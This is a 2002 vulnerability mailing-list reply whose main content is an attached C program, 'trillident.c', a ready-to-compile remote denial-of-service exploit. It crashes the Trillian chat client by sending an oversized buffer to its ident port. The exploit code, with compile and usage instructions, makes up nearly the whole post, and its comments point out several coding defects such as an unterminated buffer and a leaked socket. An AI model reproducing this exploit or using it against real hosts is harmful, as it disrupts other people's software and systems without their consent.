List: vulndiscuss
Subject: [VulnDiscuss] Re: Trillian .74 and below, ident flaw.
From: netmask {enZo} <netmask () enZ-o ! org>
Date: 2002-09-19 21:13:13
> Lance Fitz-Herbert (fitzies@hotmail.com) composed on Sep 18, 2002:
Hello Lance, out of boredom I wrote one that compiles on un*x
trillident.c is attached
netmask @ enZo
["trillident.c" (TEXT/PLAIN)]
/* Trillian .74, .73 remote DoS.. Trillian Pro 1.0 \
* Exploits buffer overflow in ident when sending over
* 418 bytes.
*
* Really only works if people are on IRC (otherwise, the ident
* daemon shuts down). And you've got to know they are running
* Trillian, obviously.
*
* bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002
*
*
* Compile With:
* Linux: gcc -o trillident trillident.c
* Solaris: gcc -o trillident trillident.c -lsocket -lnsl
* Windows: Use someone else's code.
ZZZZZZZZZZZZZZZZZZZ
Z:::::::::::::::::Z
nnnn nnnnnnnn Z:::::::::::::::::Z ooooooooooo
n:::nn::::::::nn Z:::ZZZZZZZ::::::Z oo:::::::::::oo
eeeeeeeeeee n::::::::::::::nn ZZZZZ * Z::::::Z o:::::::::::::::o
ee:::::::::::eenn:::::::::::::::n 2 Z:::::Z o:::::oooo::::::o
e:::::::::::::::een:::::nnnn:::::n 0 Z:::::Z o::::o o::o::::o
e::::::eeeee::::::en::::n n::::n 0 Z:::::Z o::::o o::oo::::o
e:::::e e:::::en::::n n::::n 2 Z:::::Z o::::oo::o o::::o
e::::::eeeee::::::en::::n n::::n * Z:::::Z o::::o::o o::::o
e::::::::::::::::e n::::n n::::n Z:::::Z o::::::oooo:::::o
e:::::eeeeeeeeeee n::::n n::::nZZZ:::::Z ZZZZZo:::::::::::::::o
e::::::e n::::n n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
e:::::::e nnnnnn nnnnnnZ:::::::::::::::::Z ooooooooooo
e:::::::eeeeeeeeee Z:::::::::::::::::Z
ee::::::::::::::e ZZZZZZZZZZZZZZZZZZZ
ee:::::::::::::e \... www.enz-o.org .../
eeeeeeeeeeeeee
(The above is radical ascii art.. Respect it. The below is a lame DoS. )
\
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define ERR -1
void usage(char* argv0);
int dostrill(char *ip, int port);
/*
 * Entry point: parse the command line and hand the last argument to
 * dostrill() as the target address.
 *
 * Options (also listed by usage()):
 *   -p PORT  TCP port to use instead of the ident default, 113.
 *   -v       print the banner to stderr and exit 0.
 *
 * The target is always argv[argc-1]; nothing checks that the final
 * argument is not itself an option or an option's operand. A bad
 * command line ends in usage(), which exits 1 and does not return.
 * The value returned by dostrill() is ignored.
 */
int main(int argc, char *argv[])
{
    extern int optopt;
    extern char *optarg;
    int bad_opts = 0;        /* number of malformed options seen */
    int target_port = 113;   /* ident/TCP unless overridden by -p */
    int opt;

    /* Reject an empty command line or an implausibly long one up front. */
    if (argc < 2 || argc > 6) {
        usage(argv[0]);
    }

    for (;;) {
        opt = getopt(argc, argv, "vp:");
        if (opt == EOF) {
            break;
        }
        switch (opt) {
        case 'p':
            fprintf(stderr, "Using port %s\n", optarg);
            /* No end-pointer or range check: a non-numeric operand
             * silently becomes port 0. */
            target_port = strtol(optarg, NULL, 10);
            break;
        case 'v':
            fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
            fprintf(stderr, "written by: netmask@enZo\n\n");
            exit(0);
        case ':':
            /* Only returned by getopt() when the optstring starts with
             * ':'; it does not here, so a missing operand is reported
             * through the '?' case instead. */
            fprintf(stderr, "Option -%c requires an operand\n", optopt);
            bad_opts++;
            break;
        case '?':
            fprintf(stderr, "Unrecognized option: -%c\n", optopt);
            bad_opts++;
            break;
        default:
            break;
        }
    }

    if (bad_opts != 0) {
        usage(argv[0]);
    }

    /* kill them */
    dostrill(argv[argc - 1], target_port);
    fprintf(stderr, "Finished!\n");
    return 0;
} /* end main */
/*
 * Print the banner and the command-line synopsis to stderr, then exit
 * with status 1. Never returns.
 *
 * argv0: the program name as invoked, echoed on the "Usage:" line.
 */
void usage(char* argv0)
{
    static const char *const banner[] = {
        "Trillian Ident DoS - [Sep 19, 2002]\n",
        "Written by: netmask@enZo\n\n",
    };
    size_t i;

    for (i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        fputs(banner[i], stderr);
    }
    fprintf(stderr, "Usage: %s [options] IP\n\n", argv0);
    fputs("-p \tPort to use\n"
          "-v \tPrint the program info\n", stderr);
    exit(1);
}
/*
 * Connect to ip:port over TCP and send the oversized buffer of 'A's
 * described in the file header.
 *
 * ip:   dotted quad or hostname; hostnames go through gethostbyname(),
 *       and a dotted quad is also tried with inet_addr() first.
 * port: TCP port to connect to, normally 113 (ident).
 *
 * Returns 0 after the buffer has been written (or from the unreachable
 * address-parse failure noted below) and 1 if the socket cannot be
 * created or connect() fails.
 *
 * Defects visible in this function, left exactly as written:
 *  - buf holds 420 'A's and no terminator, so the strlen(buf) passed to
 *    write() reads past the end of the array: undefined behaviour, and
 *    the number of bytes actually sent is whatever strlen() happens to
 *    find in memory.
 *  - s_addr is an unsigned in_addr_t, so the "< 0" test on the inet_addr()
 *    fallback can never be true; an unparsable address is carried into
 *    connect() as INADDR_NONE (0xffffffff).
 *  - when connect() fails the descriptor s is never closed.
 *  - the return value of write() is discarded.
 */
int dostrill(char *ip, int port)
{
int s, r;
char buf[420]; /* buffer to send; never NUL-terminated (see the strlen() below) */
struct sockaddr_in addr;
struct hostent *hp;
memset((char *) &addr, '\0', sizeof(addr));
addr.sin_family = AF_INET;
/* First guess at the address: treat ip as a dotted quad. Replaced below
 * whenever gethostbyname() succeeds. */
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port = htons(port);
/* Fills every byte of buf, so there is no room left for a '\0'. */
memset(buf, 'A', 420);
if ((hp = gethostbyname(ip)) != NULL) {
/* h_length is an int and sizeof is a size_t: signed/unsigned comparison.
 * The clamp also writes into the hostent owned by the C library. */
if (hp->h_length > sizeof(addr.sin_addr)) {
hp->h_length = sizeof(addr.sin_addr); }
memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
}
else {
/* s_addr is unsigned, so this test is always false and the return(0)
 * is dead code; inet_addr()'s failure value INADDR_NONE stays in s_addr. */
if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
return(0);
}
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == ERR) {
fprintf(stderr, "Couldn't Create Socket\n");
return 1;
}
r = connect(s, (struct sockaddr *) &addr, sizeof(addr));
if (r == ERR) {
fprintf(stderr, "Couldn't Establish Connection\n");
/* s is leaked on this path: there is no close() before returning. */
return 1;
}
fprintf(stderr, "Connected to %s and sending buffer\n\n", ip);
/* strlen() on an unterminated array reads out of bounds (undefined
 * behaviour); the byte count and write()'s result are both unchecked. */
write(s, buf, strlen(buf)); /* send buffer */
close(s);
return 0;
}